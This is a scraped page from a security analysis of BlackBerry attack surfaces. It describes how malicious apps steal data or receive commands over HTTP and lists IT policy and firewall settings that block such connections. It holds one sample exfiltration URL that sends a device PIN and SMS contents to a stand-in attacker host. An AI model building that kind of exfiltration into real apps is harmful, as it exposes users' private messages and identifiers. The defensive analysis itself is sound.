Blackberry JAVA DEVELOPMENT ENVIRONMENT - - FUNDAMENTALS GUIDE Dokumentacja Pobierz pdf (Strona 28)

Attack Surface Analysis of BlackBerry Devices

Proxy/Firewall Bypass

Backdoor

Port Scan

HTTP / WAP

The BlackBerry supports HTTP and WAP connections via the J2ME API javax.microedition.io.

Unsigned

and signed applications can open a new HTTP connection, and send and receive data using OutputStream

and InputStream objects.

Data Theft

A user installs some apparently useful application or video game. The application steals the user's informa-

tion and the information is passed to the attacker via a HTTP GET request. I.e.:

http://www.badsite.com/upload?&PIN=9012345678&SMS=1&FROM=0865550456&MSG=This+is+top+sec

ret+data

Backdoor

HTTP can also be used as a command and control channel. A malicious application can make an outbound

HTTP connection to retrieve commands from a remote Web site and send back data. E.g.:

IT Policy "Allow External Connections" = False

"Allow Internal Connections" = False

Application Controls "External Domains" = [list of allowed domains]

"External Network Connections" = Not Permitted

"Internal Network Connections" = Not Permitted

Device Firewall Status = Enabled

Application Permissions Connections > Carrier Internet = Deny

Other Device Settings

IT Policy "Allow External Connections" = False

"Allow Internal Connections" = False

Application Controls "External Network Connections" = Not Permitted

"Internal Network Connections" = Not Permitted

Device Firewall Status = Enabled

Application Permissions Connections > Carrier Internet = Deny

Other Device Settings

1 2 ... 23 24 25 26 27 28 29 30 31 32 33 ... 38 39

Brak uwag

Blackberry JAVA DEVELOPMENT ENVIRONMENT - - FUNDAMENTALS GUIDE Dokumentacja Strona 28